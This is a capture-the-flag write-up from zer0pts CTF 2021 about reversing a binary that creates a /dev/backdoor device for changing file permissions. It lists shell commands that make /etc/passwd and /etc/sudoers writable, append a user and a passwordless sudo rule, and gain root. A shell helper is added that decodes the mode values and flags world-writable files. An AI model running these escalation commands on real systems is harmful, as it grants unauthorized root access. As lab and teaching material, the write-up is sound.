zer0pts CTF 2021
reversing
We were given a backdoor binary. At first glance we can see some CUSE functions. Analysis quickly shows that the binary creates the character device /dev/backdoor, and that the device changes a file's permissions according to input of the form b4ckd00r:<file path>:<permission>
What remains is shell work. We want to see the contents of /root, and we have arbitrary file read / write (because we can change any file's permissions to 777).
To look inside /root, we have to become the root user. The easiest way to become root is su, so our goal is to execute su or sudo su.
We can solve this problem with the following commands:
echo 'b4ckd00r:/etc/passwd:511' > /dev/backdoor
echo tako:x:1000:1000:tako:/home:/bin/bash >> /etc/passwd
echo 'b4ckd00r:/etc/sudoers:551' > /dev/backdoor
echo 'ALL ALL=NOPASSWD: ALL' >> /etc/sudoers
echo 'b4ckd00r:/etc/sudoers:288' > /dev/backdoor
sudo /bin/su
Then we are done.
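The permission values in the commands above are easier to read in octal. The following is an added example, not part of the original writeup or the challenge binary: a small shell helper (explain_cmd is a hypothetical name) that decodes a b4ckd00r command and reports whether the resulting mode is world-writable. It assumes the device reads <permission> as a decimal integer, which is inferred from the page using 511 to get 777.

```shell
#!/bin/sh
# Added example: decode the mode field of the writeup's backdoor commands.
# Assumption: <permission> is a decimal integer (511 decimal == 0777 octal).

# explain_cmd 'b4ckd00r:<absolute path>:<decimal mode>'
# Prints "<path> <octal mode> <verdict>"; returns 1 on malformed input.
explain_cmd() {
    local cmd mode path verdict
    cmd=$1
    case $cmd in
        b4ckd00r:/*:*) ;;
        *) echo "malformed command" >&2; return 1 ;;
    esac
    mode=${cmd##*:}          # text after the last ':'
    path=${cmd#b4ckd00r:}    # drop the magic prefix ...
    path=${path%:*}          # ... and the trailing ":<mode>"
    case $mode in
        ''|*[!0-9]*) echo "mode is not a decimal number" >&2; return 1 ;;
    esac
    # Strip leading zeros so the shell does not read the field as octal.
    while [ "${#mode}" -gt 1 ] && [ "${mode#0}" != "$mode" ]; do
        mode=${mode#0}
    done
    verdict=ok
    # Bit 0002 is write permission for "other".
    if [ $(( mode & 2 )) -ne 0 ]; then
        verdict=world-writable
    fi
    printf '%s %04o %s\n' "$path" "$mode" "$verdict"
}

# The three device writes from the writeup:
#   511 -> 0777  rwx for everyone
#   551 -> 1047  sticky bit, group r--, other rwx (still writable by other)
#   288 -> 0440  read-only for owner and group; sudo refuses a
#                world-writable sudoers file, hence the final reset
for c in 'b4ckd00r:/etc/passwd:511' \
         'b4ckd00r:/etc/sudoers:551' \
         'b4ckd00r:/etc/sudoers:288'; do
    explain_cmd "$c"
done
```

Any world-writable verdict on /etc/passwd or /etc/sudoers is a finding worth alerting on, since neither file should ever be writable by non-root users.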